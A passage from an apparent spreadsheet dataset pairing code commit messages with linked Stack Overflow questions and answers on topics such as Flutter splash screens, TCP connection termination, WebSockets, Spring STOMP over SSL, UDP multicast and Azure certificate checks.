Since I was using a separate &lt;code&gt;.yaml&lt;/code&gt; file for the splash screen, as per some tutorials and the documentation, I used the following commands in my project directory:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;flutter clean
flutter pub get
dart run flutter_native_splash:create --path=native_splash.yaml
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Since the issue was still there I tried shifting everything from my &lt;code&gt;native_splash.yaml&lt;/code&gt; to my &lt;code&gt;pubspec.yaml&lt;/code&gt; and it made no changes.&lt;/p&gt;
&lt;p&gt;The following are my codes.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;main.dart&lt;/em&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void main() async {
  WidgetsBinding widgetsBinding = WidgetsFlutterBinding.ensureInitialized();
  FlutterNativeSplash.preserve(widgetsBinding: widgetsBinding);
  await Future.delayed(
    const Duration(seconds: 3),
  );
  FlutterNativeSplash.remove();
  runApp(const MyApp());
}
class MyApp extends StatelessWidget {
  const MyApp({super.key});
  @override
  Widget build(BuildContext context) {
    SystemChrome.setPreferredOrientations([
      DeviceOrientation.portraitUp,
      DeviceOrientation.portraitDown,
    ]);
    return GetMaterialApp(
      debugShowCheckedModeBanner: false,
      initialRoute: AppRoute.homeScreen,
      getPages: PageScervice.list,
    );
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;native_splash.yaml&lt;/em&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;flutter_native_splash:
  color: &amp;quot;#BBDEFB&amp;quot;
  image: &amp;quot;assets/logo-main.png&amp;quot;
  branding: &amp;quot;assets/logo-branding.png&amp;quot;
  android: true
  ios: true
  web: false
  android_12:
    color: &amp;quot;#BBDEFB&amp;quot;
    image: &amp;quot;assets/logo-main.png&amp;quot;
    branding: &amp;quot;assets/logo-branding.png&amp;quot;
    icon_background_color: &amp;quot;#BBDEFB&amp;quot;
  fullscreen: true
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;styles.xml&lt;/em&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;
&amp;lt;resources&amp;gt;
    &amp;lt;!-- Theme applied to the Android Window while the process is starting when the OS's Dark Mode setting is off --&amp;gt;
    &amp;lt;style name=&amp;quot;LaunchTheme&amp;quot; parent=&amp;quot;@android:style/Theme.Light.NoTitleBar&amp;quot;&amp;gt;
        &amp;lt;!-- Show a splash screen on the activity. Automatically removed when
             the Flutter engine draws its first frame --&amp;gt;
        &amp;lt;item name=&amp;quot;android:windowBackground&amp;quot;&amp;gt;@drawable/launch_background&amp;lt;/item&amp;gt;
        &amp;lt;item name=&amp;quot;android:forceDarkAllowed&amp;quot;&amp;gt;false&amp;lt;/item&amp;gt;
        &amp;lt;item name=&amp;quot;android:windowFullscreen&amp;quot;&amp;gt;true&amp;lt;/item&amp;gt;
        &amp;lt;item name=&amp;quot;android:windowDrawsSystemBarBackgrounds&amp;quot;&amp;gt;true&amp;lt;/item&amp;gt;
        &amp;lt;item name=&amp;quot;android:windowLayoutInDisplayCutoutMode&amp;quot;&amp;gt;shortEdges&amp;lt;/item&amp;gt;
        &amp;lt;item name=&amp;quot;android:windowIsTranslucent&amp;quot;&amp;gt;true&amp;lt;/item&amp;gt; 
    &amp;lt;/style&amp;gt;
    &amp;lt;!-- Theme applied to the Android Window as soon as the process has started.
         This theme determines the color of the Android Window while your
         Flutter UI initializes, as well as behind your Flutter UI while its
         running.
         This Theme is only used starting with V2 of Flutter's Android embedding. --&amp;gt;
    &amp;lt;style name=&amp;quot;NormalTheme&amp;quot; parent=&amp;quot;@android:style/Theme.Light.NoTitleBar&amp;quot;&amp;gt;
        &amp;lt;item name=&amp;quot;android:windowBackground&amp;quot;&amp;gt;?android:colorBackground&amp;lt;/item&amp;gt;
    &amp;lt;/style&amp;gt;
&amp;lt;/resources&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I also want to mention that logo_main.png is 500px X 500px.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C202</t>
  </si>
  <si>
    <t>Avoid TIME_WAIT state, server side: wait for client to close connection.
See:
http://stackoverflow.com/questions/3757289/tcp-option-so-linger-zero-when-its-required
By the way, never use SO_LINGER. The application level protocol should be implemented
in such way that allows the client side to find out when server side ended up sending
data and in this way the client is able to close the connectiond and server side does not
finish with sockets in TIME_WAIT state.</t>
  </si>
  <si>
    <t>For my suggestion, please read the last section: “When to use SO_LINGER with timeout 0”.
Before we come to that a little lecture about:
Normal TCP termination
TIME_WAIT
FIN, ACK and RST
Normal TCP termination
The normal TCP termination sequence looks like this (simplified):
We have two peers: A and B
A calls close()
A sends FIN to B
A goes into FIN_WAIT_1 state
B receives FIN
B sends ACK to A
B goes into CLOSE_WAIT state
A receives ACK
A goes into FIN_WAIT_2 state
B calls close()
B sends FIN to A
B goes into LAST_ACK state
A receives FIN
A sends ACK to B
A goes into TIME_WAIT state
B receives ACK
B goes to CLOSED state – i.e. is removed from the socket tables
TIME_WAIT
So the peer that initiates the termination – i.e. calls close() first – will end up in the TIME_WAIT state.
To understand why the TIME_WAIT state is our friend, please read section 2.7 in "UNIX Network Programming" third edition by Stevens et al (page 43).
However, it can be a problem with lots of sockets in TIME_WAIT state on a server as it could eventually prevent new connections from being accepted.
To work around this problem, I have seen many suggesting to set the SO_LINGER socket option with timeout 0 before calling close(). However, this is a bad solution as it causes the TCP connection to be terminated with an error.
Instead, design your application protocol so the connection termination is always initiated from the client side. If the client always knows when it has read all remaining data it can initiate the termination sequence. As an example, a browser knows from the Content-Length HTTP header when it has read all data and can initiate the close. (I know that in HTTP 1.1 it will keep it open for a while for a possible reuse, and then close it.)
If the server needs to close the connection, design the application protocol so the server asks the client to call close().
When to use SO_LINGER with timeout 0
Again, according to "UNIX Network Programming" third edition page 202-203, setting SO_LINGER with timeout 0 prior to calling close() will cause the normal termination sequence not to be initiated.
Instead, the peer setting this option and calling close() will send a RST (connection reset) which indicates an error condition and this is how it will be perceived at the other end. You will typically see errors like "Connection reset by peer".
Therefore, in the normal situation it is a really bad idea to set SO_LINGER with timeout 0 prior to calling close() – from now on called abortive close – in a server application.
However, certain situation warrants doing so anyway:
If a client of your server application misbehaves (times out, returns invalid data, etc.) an abortive close makes sense to avoid being stuck in CLOSE_WAIT or ending up in the TIME_WAIT state.
If you must restart your server application which currently has thousands of client connections you might consider setting this socket option to avoid thousands of server sockets in TIME_WAIT (when calling close() from the server end) as this might prevent the server from getting available ports for new client connections after being restarted.
On page 202 in the aforementioned book it specifically says: "There are certain circumstances which warrant using this feature to send an abortive close. One example is an RS-232 terminal server, which might hang forever in CLOSE_WAIT trying to deliver data to a stuck terminal port, but would properly reset the stuck port if it got an RST to discard the pending data."
I would recommend this long article which I believe gives a very good answer to your question.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm having trouble understanding why a WSDL would be so beneficial, when the truth is that the service definition is not that human-readable, and most developers will use automated tools to consume it to generate objects in the application. Why isn't it easier for a service provider to define a simple XML schema, and just tell me in the documentation what I can get and how I can get it? I understand the whole "universal definition" aspect, but it all just seems so overcomplicated to me. Most APIs for social sites use a basic RESTful architecture, and all they do is give you a schema representation of the data you will get back. Seriously, I must be missing something here.
</t>
  </si>
  <si>
    <t>C203</t>
  </si>
  <si>
    <t>WebSocket / WebRTC #18
I found this on your blog, there was no comment section.
Aren't Websockets and WebRTC two different things? You call it and name it WebRTC while using WebSockets.
WebRTC - high-performance over UDP
WebSocket - bidirectional over TCP.
https://stackoverflow.com/questions/18799364/webrtc-vs-websockets-if-webrtc-can-do-video-audio-and-data-why-do-i-need-web</t>
  </si>
  <si>
    <t>WebRTC is designed  for high-performance, high quality communication of video, audio and arbitrary data. In other words, for apps exactly like what you describe.
WebRTC apps need a service via which they can exchange network and media metadata, a process known as signaling. However, once signaling has taken place, video/audio/data is streamed directly between clients, avoiding the performance cost of streaming via an intermediary server.
WebSocket on the other hand is designed for bi-directional communication between client and server. It is possible to stream audio and video over WebSocket (see
here
for example), but the technology and APIs are not inherently designed for efficient, robust streaming in the way that WebRTC is.
As other replies have said, WebSocket can be used for signaling.
I maintain a list of
WebRTC resources
: strongly recommend you start by looking at the 2013 Google I/O
presentation
about WebRTC.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using &lt;code&gt;useCookie&lt;/code&gt; in Nuxt 3. Based on the &lt;a href="https://nuxt.com/docs/api/utils/refresh-cookie" rel="nofollow noreferrer"&gt;documentation&lt;/a&gt;, after the cookie is updated, it can be refreshed manually using &lt;code&gt;refreshCookie&lt;/code&gt;. However, the ref returned by &lt;code&gt;useCookie&lt;/code&gt; does not seem to be reactive despite calling &lt;code&gt;refreshCookie&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Here is an example which occurs on the client side.&lt;/p&gt;
&lt;p&gt;The cookie is initially read and stored in a variable. At some point in the code, a request is made to an API endpoint on the server and the response sets the cookie. After awaiting the request, the cookie is refreshed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const userIdCookie = useCookie('service_user_id')
await someApiCall(...)
refreshCookie('service_user_id')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Despite refreshing, &lt;code&gt;userIdCookie&lt;/code&gt; remains unchanged: It is still &lt;code&gt;undefined&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;console.log(userIdCookie.value) // undefined
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On the other hand, calling &lt;code&gt;useCookie('service_user_id')&lt;/code&gt; always yields the correct value:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;console.log(userIdCookie.value, useCookie('service_user_id').value) // undefined, '1234-abcd'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does anyone know what's happening here? I tried using &lt;code&gt;watch: true&lt;/code&gt; as described in the docs, but the result remains the same.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C204</t>
  </si>
  <si>
    <t>deal with websocket problem
https://stackoverflow.com/questions/58054514/nextjs-express-error-during-websocket-handshake-unexpected-response-code-200
https://github.com/websockets/ws#multiple-servers-sharing-a-single-https-server</t>
  </si>
  <si>
    <t>Ok, after more digging I have solved the problem. Quite simply, the ws.Server object to which I was trying to feed the server = express() object is not strictly speaking an http server object. However, server.listen() returns such an http server object. On such an object we can listen for an 'upgrade' call, which we can pass to our ws.Server object's handleUpgrade() event listener, through which we can connect. I will be updating the examples that I linked in my question, but the relevant code is below:
app.prepare().then(() =&gt; {
    const server = express()
    server.all('*', (req, res) =&gt; {
    return handle(req, res)
    })
    const wss = new SocketServer({ server });
    wss.on('connection', function connection(ws, request) {
        console.log('Client connected');
        ws.on('close', () =&gt; console.log('Client disconnected'));
    });
    wss.on('error', function (error) {
        console.log(error);
    });
    let srv = server.listen(port, err =&gt; {
    if (err) throw err
    console.log(`&gt; Ready on http://localhost:${port}`)
    })
    srv.on('upgrade', function(req, socket, head) {
        wss.handleUpgrade(req, socket, head, function connected(ws) {
            wss.emit('connection', ws, req);
        })
    });</t>
  </si>
  <si>
    <t xml:space="preserve">What is the difference between using a new thread and using a thread from the thread pool? What performance benefits are there and why should I consider using a thread from the pool rather than one I've explicitly created? I'm thinking specifically of .NET here, but general examples are fine.
</t>
  </si>
  <si>
    <t>C205</t>
  </si>
  <si>
    <t>Update Reverse-Proxy.md
hi,
tnx for this great tool. very useful!
above fixed websocket connection for old Apache.
( https://stackoverflow.com/questions/53939609/apache-websocket-connectionupgrade-replaced-by-keep-alive  helped. )</t>
  </si>
  <si>
    <t>I do not completely understand how this works, but the nuggets of wisdom I have gleaned and the solution I have devised are as follows:
Apache does not understand websockets in one sense (i.e. when it is talking to itself). As a result, you need to use mod_rewrite and set the protocol to ws:// in order to forward websockets upstream (it seems that no amount of setting headers will help you here).
If you set the protocol to ws://, then Apache will set the appropriate headers (Connection: Upgrade and Upgrade: websocket) when proxying requests upstream. However, for some reason, it does not seem to do this when proxying requests to itself / another VirtualHost.
You can see a blurb in VirtualHost *:80 (copied below) that tries to discern whether a websocket is in order and then change the protocol accordingly. This will not work for VirtualHost *:8080 (see the above bullet). Other methods are necessary.
 RewriteCond %{HTTP:Upgrade} =websocket
 RewriteRule /(.*) ws://localhost:8080/$1 [P,L]
 RewriteCond %{HTTP:Upgrade} !=websocket
 RewriteRule /(.*) http://localhost:8080/$1 [P,L]
Put all of this together, and you have to communicate to VirtualHost *:8080 that a websocket connection is needed upstream. Luckily, we are in control of VirtualHost *:80 and can discern this information / pass it along. We must do so without touching the Connection or Upgrade headers, since Apache does weird things with them. The protocol may be traceable, but I am not sure how to do that. As a result, I use a bogus, internal, custom header for the transmission. Probably best to name it in such a way that collisions are unlikely.
In VirtualHost *:80, we add a block like:
SetEnvIf Upgrade ^websocket$ websock=true
RequestHeader set X-Is-Websocket %{websock}e
And then we read that header in VirtualHost *:8080, changing the protocol if necessary:
SetEnvIf X-Is-Websocket ^true$ websock=true
RequestHeader unset X-Is-Websocket
# change protocol if necessary
RewriteCond %{ENV:websock} =true
RewriteRule /(.*) ws://proxy-debug:8080/$1 [P,L]
RewriteCond %{ENV:websock} !=true
RewriteRule /(.*) http://proxy-debug:8080/$1 [P,L]
Hope it helps! :)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It seems that the path in Git config &lt;a href="https://git-scm.com/docs/git-config#Documentation/git-config.txt-blameignoreRevsFile" rel="nofollow noreferrer"&gt;&lt;code&gt;blame.ignoreRevsFile&lt;/code&gt;&lt;/a&gt; is either resolved relative to the work tree (for repositories with a work tree), or relative to the repository itself (for bare repositories). AFAICT this is not documented (but it can be easily verified, see below).&lt;/p&gt;
&lt;p&gt;Is there an easy way to get the path to that directory, whichever it is, e.g. using &lt;a href="https://git-scm.com/docs/git-rev-parse" rel="nofollow noreferrer"&gt;&lt;code&gt;git-rev-parse&lt;/code&gt;&lt;/a&gt;?&lt;/p&gt;
&lt;p&gt;There is &lt;a href="https://git-scm.com/docs/git-rev-parse#Documentation/git-rev-parse.txt---show-toplevel" rel="nofollow noreferrer"&gt;&lt;code&gt;--show-toplevel&lt;/code&gt;&lt;/a&gt; to get the path to the work tree (if there is one) and &lt;a href="https://git-scm.com/docs/git-rev-parse#Documentation/git-rev-parse.txt---git-dir" rel="nofollow noreferrer"&gt;&lt;code&gt;--git-dir&lt;/code&gt;&lt;/a&gt; to get the path to the repository. I can of course implement logic that uses one or the other, whichever is appropriate, but I was wondering if there is an intended way of getting that particular directory that is used to resolve the path of &lt;code&gt;blame.ignoreRevsFile&lt;/code&gt;Â (and maybe other config variables).&lt;/p&gt;
&lt;h6&gt;Verifying where &lt;code&gt;git blame&lt;/code&gt; is looking for &lt;code&gt;blame.ignoreRevsFile&lt;/code&gt;&lt;/h6&gt;
&lt;p&gt;Non-bare repository:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;~/test$ git init non-bare
Initialized empty Git repository in test/non-bare/.git/
~/test$ cd non-bare/
~/test/non-bare$ touch foo
~/test/non-bare$ git add foo
~/test/non-bare$ git commit -m foo
[main (root-commit) 82a5c56] foo
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 foo
~/test/non-bare$ git config blame.ignoreRevsFile ignore-refs-file
~/test/non-bare$ git blame -P foo
fatal: could not open object name list: ignore-refs-file
Exit code: 128
~/test/non-bare$ touch ignore-refs-file
~/test/non-bare$ git -P blame foo
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Bare respository:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;~/test$ git clone --bare non-bare/ bare.git
Cloning into bare repository 'bare.git'...
done.
~/test$ cd bare.git/
~/test/bare.git$ git config blame.ignoreRevsFile ignore-refs-file
~/test/bare.git$ git -P blame foo
fatal: could not open object name list: ignore-refs-file
Exit code: 128
~/test/bare.git$ touch ignore-refs-file
~/test/bare.git$ git -P blame foo
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C206</t>
  </si>
  <si>
    <t>Add WebFlux WebSocket from Kafka sample
See SO https://stackoverflow.com/questions/65667450/spring-webflux-with-kafka-and-websockets</t>
  </si>
  <si>
    <t>I would consider to have a Sinks.many().multicast().onBackpressureBuffer() as global intermediate container. Then in your receiveData() you just sink data into that Reactor abstraction.
For your WebSocket connected sessions I would suggest to implement a org.springframework.web.reactive.socket.WebSocketHandler and use Sinks.Many.asFlux() in the WebSocketSession.send(Publisher&lt;WebSocketMessage&gt; messages) API. This way all your sessions are going to consume the same Kafka data as long as they are connected to this WebSocket server.
See more info in docs: https://docs.spring.io/spring-framework/docs/current/reference/html/web-reactive.html#webflux-websockethandler
UPDATE
You can find some sample here: https://github.com/artembilan/sandbox/tree/master/so-65667450</t>
  </si>
  <si>
    <t xml:space="preserve">We built a grant application system for a client. They've now asked for some simple workflow functionality (two approvals needed before the application is submitted). 
I've given some thought to the database design that I'd use to encode the workflow requirements in a way that would offer maximum flexibility and reusability, and I'd be interested to know if there are any existing design patterns or best practices out there for this type of system. Any suggestions?
Note: This is a custom ASP.NET application, and we'll definitely be rolling our own workflow solution. I'm not interested in buying into a component, or much less moving this whole thing to a platform like SharePoint. 
</t>
  </si>
  <si>
    <t>C207</t>
  </si>
  <si>
    <t>Provided on TCP client to WebSocket relay in order to work around DNS
 and SSL issues with Netty's default TCP client.
See reactor/reactor-netty#1431 , https://stackoverflow.com/questions/50846671/using-amazon-mq-as-a-broker-relay-for-spring-websockets-stomp , https://stackoverflow.com/questions/53105451/how-to-use-spring-messaging-5-1-to-connect-stompssl-broker , https://projectreactor.io/docs/netty/snapshot/reference/index.html</t>
  </si>
  <si>
    <t>I wanna using stomp over websocket and intend to integrate with Amazon MQ, but Amazon MQ using stomp+ssl as default, then i encounter my problem.
    @Configuration
    @EnableWebSocketMessageBroker
    public class WebSocketConfig implements WebSocketMessageBrokerConfigurer {
    @Autowired
    private ActiveMQProperties activeMQProperties;
    /**
     * Register STOMP endpoints mapping each to a specific URL and (optionally)
     * enabling and configuring SockJS fallback options.
     *
     * @param registry
     */
    @Override
    public void registerStompEndpoints(StompEndpointRegistry registry) {
        registry.addEndpoint("/endpoint").setAllowedOrigins("*");
    }
    /**
     * Configure message broker options.
     *
     * @param registry
     */
    @Override
    public void configureMessageBroker(MessageBrokerRegistry registry) {
        registry.setApplicationDestinationPrefixes("/app");
        registry.enableStompBrokerRelay("/queue", "/topic")
                .setAutoStartup(true)
                .setVirtualHost(activeMQProperties.getHost())
                .setRelayHost(activeMQProperties.getHost())
                .setRelayPort(activeMQProperties.getPort())
                .setSystemLogin(activeMQProperties.getUser())
                .setSystemPasscode(activeMQProperties.getPassword())
                .setClientLogin(activeMQProperties.getUser())
                .setClientPasscode(activeMQProperties.getPassword());
       }}
**ReactorNettyTcpClient is the implementation of TcpOperations in spring-messaging-5.1.*, how can it support SSL?**
Works like a charm. One thing I needed to do was slightly update TCP client creation:
    @Override
    public void configureMessageBroker(MessageBrokerRegistry registry) {
    ReactorNettyTcpClient&lt;byte[]&gt; tcpClient = new ReactorNettyTcpClient&lt;&gt;(configurer -&gt; configurer
            .host(properties.getRelayHost())
            .port(properties.getRelayPort())
            .secure(), new StompReactorNettyCodec());
    registry.enableStompBrokerRelay("/queue", "/topic")
            .setAutoStartup(true)
            .setSystemLogin(properties.getClientLogin())
            .setSystemPasscode(properties.getClientPasscode())
            .setClientLogin(properties.getClientLogin())
            .setClientPasscode(properties.getClientPasscode())
            .setTcpClient(tcpClient);
    registry.setApplicationDestinationPrefixes("/app");
    }
Dependencies:
&lt;parent&gt;
    &lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;
    &lt;artifactId&gt;spring-boot-starter-parent&lt;/artifactId&gt;
    &lt;version&gt;2.4.4&lt;/version&gt;
    &lt;relativePath/&gt;
&lt;/parent&gt;
.
.
.
&lt;dependency&gt;
    &lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;
    &lt;artifactId&gt;spring-boot-starter-websocket&lt;/artifactId&gt;
&lt;/dependency&gt;
&lt;dependency&gt;
    &lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;
    &lt;artifactId&gt;spring-boot-starter-activemq&lt;/artifactId&gt;
&lt;/dependency&gt;
&lt;dependency&gt;
    &lt;groupId&gt;org.apache.activemq&lt;/groupId&gt;
    &lt;artifactId&gt;activemq-stomp&lt;/artifactId&gt;
    &lt;version&gt;5.16.2&lt;/version&gt;
&lt;/dependency&gt;
&lt;dependency&gt;
    &lt;groupId&gt;io.projectreactor.netty&lt;/groupId&gt;
    &lt;artifactId&gt;reactor-netty&lt;/artifactId&gt;
    &lt;version&gt;1.0.8&lt;/version&gt;
&lt;/dependency&gt;</t>
  </si>
  <si>
    <t>Finally, the issue was with enabling the SSL protocol. Here's how I did it:
I created a custom StompTcpFactory, to create a tcp client with SSL enabled:
A TCP Client Factory to enable SSL connection */ public class StompTcpFactory implements NetStreams.TcpClientFactory&lt;Message&lt;byte[]&gt;, Message&lt;byte[]&gt;&gt; {
private final Environment environment; private final EventLoopGroup eventLoopGroup; private final boolean ssl; private final List&lt;String&gt; addresses;
public StompTcpFactory(List&lt;String&gt; addresses, boolean ssl) { this.addresses = addresses; this.ssl = ssl; this.environment = new Environment( () -&gt; new ReactorConfiguration(Collections.emptyList(), "sync", new Properties())); this.eventLoopGroup = Reactor2TcpClient.initEventLoopGroup(); }
@Override public Spec.TcpClientSpec&lt;Message&lt;byte[]&gt;, Message&lt;byte[]&gt;&gt; apply( Spec.TcpClientSpec&lt;Message&lt;byte[]&gt;, Message&lt;byte[]&gt;&gt; tcpClientSpec) { Supplier&lt;InetSocketAddress&gt; supplier = new InetSocketAddressSupplier(addresses); return tcpClientSpec.env(environment).options(new NettyClientSocketOptions().eventLoopGroup(eventLoopGroup)) .codec(new Reactor2StompCodec(new StompEncoder(), new StompDecoder())).ssl(ssl ? new SslOptions() : null) .connect(supplier); }
}
Notice the .ssl call to set the flag to use ssl. Also I receive a list of addresses to config the endpoints and a boolean to be able to turn on and off ssl (for dev) .The InetSocketAddressSupplier was created to switch between the 2 addresses that Amazon gives you when working with a HA setup:
/**
 * Address supplier for failover connection
 */
@Slf4j
public class InetSocketAddressSupplier implements Supplier&lt;InetSocketAddress&gt; {
  private static int counter = 0;
  private final List&lt;String&gt; addresses;
  InetSocketAddressSupplier(List&lt;String&gt; addresses) {
    Assert.notNull(addresses, "addresses list cannot be null");
    Assert.isTrue(!addresses.isEmpty() &amp;&amp; (addresses.size() == 2), "Addresses list must be of size 2");
    this.addresses = addresses;
  }
  @Override
  public InetSocketAddress get() {
    int serverIndex = counter % 2;
    counter++;
    String[] info = addresses.get(serverIndex).split(":");
    log.debug("Returning server {} {}:{} for connection", serverIndex, info[0], info[1]);
    return new InetSocketAddress(info[0], Integer.valueOf(info[1]));
  }
}
If you don't need the HA setup, you can simply create an inline supplier as it's shown in Spring docs.
You can then configure your websocket endpoint to use this factory to create the client, and also set the user/password for the system and client connections:
@Slf4j @Configuration @EnableWebSocketMessageBroker public class WebSocketConfiguration extends AbstractWebSocketMessageBrokerConfigurer {
@Qualifier("websocket") private MessageBrokerProperties config; private InetSocketAddressSupplier supplier;
public WebSocketConfiguration(MessageBrokerProperties config) { this.config = config; this.supplier = new InetSocketAddressSupplier(config.getAddresses()); }
@Override public void configureMessageBroker(MessageBrokerRegistry registry) { InetSocketAddress address = supplier.get(); registry.enableStompBrokerRelay("/topic").setRelayHost(address.getHostName()).setRelayPort(address.getPort()) .setSystemLogin(config.getSystemLogin()).setSystemPasscode(config.getSystemPasscode()) .setClientLogin(config.getClientLogin()).setClientPasscode(config.getClientPasscode()) .setTcpClient(createTcpClient()); registry.setApplicationDestinationPrefixes("/app"); }
private TcpOperations&lt;byte[]&gt; createTcpClient() { return new Reactor2TcpClient&lt;&gt;(new StompTcpFactory(config.getAddresses(), config.isUseSSL())); } }
Hope it helps...</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We were trying to automate the Certificate expiry of our azure APIM instance custom domain certificates added to the host using an Azure Devops pipeline. With below automation we were able to get the hostnames associated with the custom domain, but we're not able to fetch the certificates and their expiry details. The code is returning blank output. Any guidance, please?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;parameters:
  - name: apimName
    type: string
    default: 'myapim'
  - name: resourceGroup
    type: string
    default: 'myapim-rg'
  - name: thresholdDays
    type: string
    default: 60
jobs:
  - job: CheckAPIMSSL
    displayName: 'Check SSL Certificate Expiry for APIM Custom Domains'
    steps:
      - task: AzureCLI@2
        displayName: 'Check SSL Certificate Expiry'
        inputs:
          azureSubscription: 'mysubscription'
          scriptType: bash
          scriptLocation: inlineScript
          inlineScript: |
            APIM_NAME='${{ parameters.apimName }}'
            RESOURCE_GROUP='${{ parameters.resourceGroup }}'
            THRESHOLD_DAYS=${{ parameters.thresholdDays }}
            EXPIRED=0
            echo &amp;quot;Fetching custom domain details for APIM: $APIM_NAME&amp;quot;
            customDomains=$(az apim show --name $APIM_NAME --resource-group $RESOURCE_GROUP --query &amp;quot;hostnameConfigurations[].hostName&amp;quot; -o tsv)
            for DOMAIN in $customDomains
            do
              echo &amp;quot;Checking SSL certificate for custom domain: $DOMAIN&amp;quot;
              EXPIRY_DATE=$(az apim show --name $APIM_NAME --resource-group $RESOURCE_GROUP --query &amp;quot;hostnameConfigurations[?hostName=='$DOMAIN'].certificate.expirationDate&amp;quot; -o tsv)
              if [ -z &amp;quot;$EXPIRY_DATE&amp;quot; ]; then
                echo &amp;quot;ERROR: Could not retrieve SSL certificate info for $DOMAIN&amp;quot;
                EXPIRED=1
                continue
              fi
              EXPIRY_TIMESTAMP=$(date -d &amp;quot;$EXPIRY_DATE&amp;quot; +%s)
              CURRENT_TIMESTAMP=$(date +%s)
              DAYS_LEFT=$(( (EXPIRY_TIMESTAMP - CURRENT_TIMESTAMP) / 86400 ))
              echo &amp;quot;SSL certificate for $DOMAIN expires in $DAYS_LEFT days.&amp;quot;
              if [ &amp;quot;$DAYS_LEFT&amp;quot; -lt &amp;quot;$THRESHOLD_DAYS&amp;quot; ]; then
                echo &amp;quot;ALERT: SSL certificate for $DOMAIN is expiring in less than $THRESHOLD_DAYS days!&amp;quot;
                EXPIRED=1
              else
                echo &amp;quot;SSL certificate for $DOMAIN is valid for more than $THRESHOLD_DAYS days.&amp;quot;
              fi
            done
            if [ &amp;quot;$EXPIRED&amp;quot; -eq 1 ]; then
              echo &amp;quot;certificates are expiring soon in XX days.&amp;quot;
              exit 1
            else
              echo &amp;quot;All certificates are valid for more than $THRESHOLD_DAYS days.&amp;quot;
            fi
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C208</t>
  </si>
  <si>
    <t>UDP multicast problem is described here: https://stackoverflow.com/a/60397082/1565832. Debugging how to rejoin multicast group. Following already works: leave, wait 500 ms, join</t>
  </si>
  <si>
    <t>Multicast is not a trivial thing. From what you are describing, the following happens:
When you perform
setsockopt(fd, IPPROTO_IP, IP_ADD_MEMBERSHIP, &amp;igmpv2_req, sizeof(struct ip_mreqn))
then the client sends out an igmp join message for this group. Your switch has igmp snooping enabled and now knows to forward the multicast packets for this group to the port of your host.
Now, after the time you observed (4-5 minutes, 260 seconds is indeed the default with many switches) this information in the switch times out, because the host does not send these messages regularly/unsolicited.
You need a multicast router on your network, that regularly queries the hosts, which respond with igmp reports for the multicast groups they are listening to, to keep the igmp snooping tables on the switching hardware up to date.
Alternatively, you can also try to disable igmp snooping on all devices between multicast sender and receiver, so that all multicast message are flooded to all ports (making them broadcast from a layer-2 point of view). This can put quite a high load on the layer-2 segment, so the first method is preferred.
An ugly workaround (that I have not tested yet) could be to drop and re-add membership with setsockopt() every 2-3 minutes. This should force an igmp packet and thus maintain multicast connectivity, but this is not how it is supposed to work.</t>
  </si>
  <si>
    <t xml:space="preserve">User A logs into a ticket management system to edit content on "SomePage.aspx"
User B logs in 30 seconds later to edit the same ticket on "SomePage.aspx"
What are some of the best known practices(in a 3-tier architecture) for notifying each of the users that someone else is modifying the same content?  
</t>
  </si>
  <si>
    <t>C209</t>
  </si>
  <si>
    <t>UDP issue Fixed
https://stackoverflow.com/questions/49524950/udp-java-not-sending-full-string</t>
  </si>
  <si>
    <t>String info = new String(get.getData());
The problem is here, in the receiving code. It should be:
    String info = new String(get.getData(), get.getOffset(), get.getLength());
At present you are ignoring the actual length of the DatagramPacket, and assuming it filled the buffer, and filling the String full of rubbish.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When creating a paging scroll view and ignoring the top safe area the items within the scroll area do not center to the view, they seem to have an offset of the same size as the bottom safe area times the slide item number.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/M6n79wcp.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/M6n79wcp.png" alt="Slide 1" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/C3Oso7rk.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/C3Oso7rk.png" alt="Slide 2" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/fhvJJB6t.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/fhvJJB6t.png" alt="Slide 3" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Notice how the next protrudes more and more by each slide we move forward. I &lt;strong&gt;do not&lt;/strong&gt; want to ignore the bottom safe area, just the top one.&lt;/p&gt;
